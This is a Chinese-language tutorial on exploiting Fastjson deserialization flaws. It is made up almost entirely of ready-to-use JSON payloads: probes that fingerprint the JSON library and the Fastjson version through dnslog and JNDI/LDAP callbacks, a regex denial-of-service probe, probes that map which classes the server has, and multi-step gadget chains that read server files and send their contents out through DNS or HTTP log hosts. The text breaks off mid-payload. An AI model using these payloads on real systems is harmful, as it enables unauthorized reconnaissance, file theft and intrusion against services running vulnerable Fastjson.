完全零基础入门Fastjson系列漏洞-提高篇(一)
字数 2467 2025-08-23 18:31:34
Fastjson漏洞利用提高篇(一) - 全面指南
零、前言
本文是Fastjson漏洞利用的提高篇,主要涵盖以下内容:
- 判断所使用的Json库
- 判断Fastjson版本
- 探测服务器环境
- 文件读取利用
- 文件写入利用
一、判断所使用的Json库
1.1 Fastjson判断方法
1.1.1 dnslog判断法
{
"@type": "java.net.InetSocketAddress",
"address":,
"val": "rtpmognpiy.dgrh3.cn"
}
或
{
{"@type": "java.net.URL", "val": "http://qvhkmkgcta.dgrh3.cn"}: "a"
}
如果收到dnslog请求,说明使用的是Fastjson。
1.1.2 解析判断法
{
"ext": "blue",
"name": {"$ref": "$.ext"}
}
如果解析成功,说明是Fastjson。
1.2 Jackson判断方法
1.2.1 浮点类型精度丢失判断法
{"score": 1.1111111111111111111111111111111111111111111111111111111111111}
如果返回类似1.1111111111111112,可能是Jackson。
1.2.2 注释符判断法
{"age": 1} /*#W01fh4cker
如果不报错,说明是Jackson。
1.2.3 单引号判断法
{"username": 'admin', "password": 'admin'}
如果报错,说明是Jackson。
1.3 Gson判断方法
1.3.1 注释符判断法
#\r\n
{"score": 1.1}
正常说明为Gson。
1.4 org.json判断方法
{"username": '\r', "password": "admin"}
出现特定报错说明是org.json。
1.5 hutool.json判断方法
{a:whatever} /*\r\nxxx
如果返回正确(最好能看到返回的值为),说明是hutool.json。
二、判断Fastjson版本
2.1 有报错信息返回的情况
2.1.1 JSON.parseObject(jsondata, User.class)
- 1.1.15<=version<=1.1.26:
syntax error, expect {, actual EOF - 1.1.27<=version<=1.2.11:
syntax error, expect {, actual EOF, pos 9 - 1.2.12<=version<=1.2.24:
type not match - 1.2.25<=version<=2.0.1:
type not match. java.lang.AutoCloseable -> org.example.Main$User - 2.0.1<=version<=2.0.5.graal及2.0.9<=version<=2.0.12:
error, offset 35, char - 2.0.6<=version<=2.0.7:
illegal character - 2.0.8及2.0.13<=version<=2.0.40: 报错中会直接显示版本号
2.1.2 JSON.parse(jsonData)
- 1.1.15<=version<=1.1.26:
syntax error, expect {, actual EOF - 1.1.27<=version<=1.2.32:
syntax error, expect {, actual EOF, pos 0 - 1.2.33<=version<=2.0.40: 报错中会直接显示版本号
2.2 dnslog判断法
2.2.1 判断1.1.15<=version<=1.2.24
{
"name": "admin",
"email": "admin",
"content": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://aclarecpsj.dgrh3.cn/POC",
"autoCommit": true
}
}
2.2.2 判断1.2.37<=version<=1.2.83
{
{"@type": "java.net.URL", "val": "http://rpdmvyfajp.dgrh3.cn"}: "aaa"
}
2.2.3 判断1.2.9<=version<=1.2.47
{
"username": {
"@type": "java.net.InetAddress",
"val": "bjmgclhjrs.dgrh3.cn"
},
"password": "admin"
}
2.2.4 判断1.2.10<=version<=1.2.47
[
{
"@type": "java.lang.Class",
"val": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.net.InetSocketAddress",
"address":,
"val": "6m2csu.dnslog.cn"
}
]
2.2.5 判断1.2.9<=version<=1.2.36
{
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.net.URL",
"val": "http://tbqnrzguzp.dgrh3.cn"
}
""
}
2.2.6 判断1.2.37<=version<=1.2.83
同上payload,如果dnslog有响应。
2.2.7 判断1.2.9<=version<=1.2.83
Set [{
"@type": "java.net.URL",
"val": "http://wobfyhueao.dgrh3.cn"
}]
2.2.8 判断version≠(1.2.24 || 1.2.83)
{
"page": {
"pageNumber": 1,
"pageSize": 1,
"zero": {
"@type": "java.lang.Exception",
"@type": "org.XxException"
}
}
}
2.2.9 判断1.2.69<=version<=1.2.83
{
"page": {
"pageNumber": 1,
"pageSize": 1,
"zero": {
"@type": "java.lang.AutoCloseable",
"@type": "java.io.ByteArrayOutputStream"
}
}
}
2.2.10 判断1.2.48<=version<=1.2.83
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl"
}
}
2.2.11 判断version=1.2.24
{
"zero": {
"@type": "com.sun.rowset.JdbcRowSetImpl"
}
}
2.3 延迟判断法
2.3.1 浅蓝正则ddos探测法(1.2.36<=version<=1.2.63_noneautotype)
{
"regex": {
"$ref": "$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]"
},
"blue": "aaa!"
}
慎用,可能会影响业务系统。
2.3.2 jndi请求延迟探测法
2.3.2.1 判断1.2.4<=version<=1.2.47
{
"name": {
"\u0040\u0074\u0079\u0070\u0065": "\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073",
"\u0076\u0061\u006c": "\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"
},
"x": {
"\u0040\u0074\u0079\u0070\u0065": "\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c",
"\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065": "ldap://1.2.3.4/test111",
"autoCommit": true
}
}
2.3.2.2 判断1.1.16<=version<=1.2.24
{
"username": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://1.2.3.4/POC",
"autoCommit": true
}
}
2.3.2.3 变种:判断1.1.16<=version<=1.2.11
{
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://1.2.3.4/POC",
"autoCommit": true
}
""
}
2.3.2.4 判断1.2.28<=version<=1.2.47
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://1.2.3.4/POC",
"autoCommit": true
}
}
2.3.2.5 变种:判断1.2.9<=version<=1.2.11
{
"@type": "com.alibaba.fastjson.JSONObject",
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://1.2.3.4/POC",
"autoCommit": true
}
}
2.4 关键版本探测
2.4.1 v1.2.24
使用2.3中提到的延时判断方法。
2.4.2 v1.2.47
{
"username": {
"@type": "java.net.InetSocketAddress",
"address":,
"val": "rylxkswlfg.dgrh3.cn"
}
}
或
[
{
"@type": "java.lang.Class",
"val": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.net.InetSocketAddress",
"address":,
"val": "rylxkswlfg.dgrh3.cn"
}
]
2.4.3 v1.2.68
[
{
"@type": "java.lang.AutoCloseable",
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.net.InetSocketAddress",
"address":,
"val": "mwhajokbdd.dgrh3.cn"
}
]
2.4.4 v1.2.80与v1.2.83
[
{
"@type": "java.lang.Exception",
"@type": "com.alibaba.fastjson.JSONException",
"x": {
"@type": "java.net.InetSocketAddress",
"address":,
"val": "xfjdbd.dnslog.cn"
}
},
{
"@type": "java.lang.Exception",
"@type": "com.alibaba.fastjson.JSONException",
"message": {
"@type": "java.net.InetSocketAddress",
"address":,
"val": "uawcowbohf.dgrh3.cn"
}
}
]
如果第一个收到响应而第二个没有收到,说明版本为1.2.80;如果两个都收到了,说明版本是1.2.83。
三、探测服务器环境
3.1 空值判断法
{
"z": {
"@type": "java.lang.Class",
"val": "org.springframework.web.bind.annotation.RequestMapping"
}
}
如果系统存在这个类,会返回一个类实例;如果不存在会返回null。
3.2 dnslog回显判断法
{
"@type": "java.net.Inet4Address",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "java.util.Locale",
"language": {
"@type": "java.lang.String",
"1": {
"@type": "java.lang.Class",
"val": "com.mysql.jdbc.Driver"
}
},
"country": "aaa.qmc8xj4s.dnslog.pw"
}
}
}
}
只有MacOS可以ping带花括号的域名。
3.3 报错回显判断法
{
"x": {
"@type": "java.lang.Character",
"@type": "java.lang.Class",
"val": "com.mysql.jdbc.Driver"
}
}
四、文件读取
4.1 fastjson【1.2.73<=version<=1.2.80】
4.1.1 aspectjtools
4.1.1.1 直接回显法
分三次打:
{"@type": "java.lang.Exception", "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"}
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [{}]
}
}
}
}
{
"username": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "c:/windows/win.ini"
},
"password": "admin"
}
或一次性打:
[
{
"@type": "java.lang.Exception",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
},
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [
{
"username": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "c:/windows/win.ini"
},
"password": "admin"
}
]
}
}
}
}
]
4.1.1.2 报错回显法
[
{
"@type": "java.lang.Exception",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
},
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [
{
"username": {
"@type": "java.lang.Character",
"c": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "c:/windows/win.ini"
}
},
"password": "admin"
}
]
}
}
}
}
]
4.1.1.3 dnslog回显法(需要对方为mac环境且dnslog平台支持特殊符号)
[
{
"@type": "java.lang.Exception",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
},
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [
{
"username": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "1.txt"
},
"password": {
"@type": "java.net.Inet4Address",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "java.util.Locale",
"language": {
"@type": "java.lang.String",
"$ref": "$"
},
"country": "aaa.qmc8xj4s.dnslog.pw"
}
}
}
}
}
]
}
}
}
}
]
4.1.1.4 httplog回显法(另需ognl>=2.7以及commons-io>=2.0)
分两次打:
[
{
"@type": "java.lang.Exception",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
},
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [
{
"username": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "test"
},
"password": "admin"
}
]
}
}
}
}
]
{
"su14": {
"@type": "java.lang.Exception",
"@type": "ognl.OgnlException"
},
"su15": {
"@type": "java.lang.Class",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "ognl.OgnlException",
"_evaluation": ""
}
}
},
"su16": {
"@type": "ognl.Evaluation",
"node": {
"@type": "ognl.ASTMethod",
"p": {
"@type": "ognl.OgnlParser",
"stream": {
"@type": "org.apache.commons.io.input.BOMInputStream",
"delegate": {
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "jdk.nashorn.api.scripting.URLReader",
"url": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "java.util.Locale",
"language": "http://127.0.0.1:8085/?test",
"country": {
"@type": "java.lang.String",
[
{
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "C:/Windows/win.ini"
}
]
}
}
}
},
"charsetName": "UTF-8",
"bufferSize": 1024
}
},
"boms": [
{
"@type": "org.apache.commons.io.ByteOrderMark",
"charsetName": "UTF-8",
"bytes": [36]
}
]
}
}
}
},
"su17": {
"$ref": "$.su16.node.p.stream"
},
"su18": {
"$ref": "$.su17.bOM.bytes"
}
}
4.1.2 aspectjtools+xalan(>=2.4.0)+dom4j(版本无限制)
4.1.2.1 直接回显法
分五次打:
[
{
"@type": "java.lang.Exception",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
},
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [
{
"username": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "test"
},
"password": "admin"
}
]
}
}
}
}
]
{
"@type": "java.lang.Exception",
"@type": "org.apache.xml.dtm.DTMConfigurationException",
"locator": {}
}
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.apache.xml.dtm.DTMConfigurationException",
"locator": {}
}
}
}
}
{
"su14": {
"@type": "javax.xml.transform.SourceLocator",
"@type": "org.apache.xpath.objects.XNodeSetForDOM",
"nodeIter": {
"@type": "org.apache.xpath.NodeSet"
},
"xctxt": {
"@type": "org.apache.xpath.XPathContext",
}
}
}
4.1.2.2 httplog回显法
修改最后一步为:
{
"@type": "java.io.InputStream",
"@type": "org.apache.commons.io.input.BOMInputStream",
"delegate": {
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "jdk.nashorn.api.scripting.URLReader",
"url": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "java.util.Locale",
"language": "http://127.0.0.1:8085/?test",
"country": {
"@type": "java.lang.String",
[
{
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "C:/Users/whoami/Desktop/testtest.txt"
}
]
}
}
}
},
"charsetName": "UTF-8",
"bufferSize": 1024
},
"boms": [
{
"@type": "org.apache.commons.io.ByteOrderMark",
"charsetName": "UTF-8",
"bytes": [98]
}
]
}
}
4.2 fastjson【1.2.37<=version<=1.2.68】
4.2.1 blackhat2021-getBom()原版(适用场景有限)
{
"abc": {
"@type": "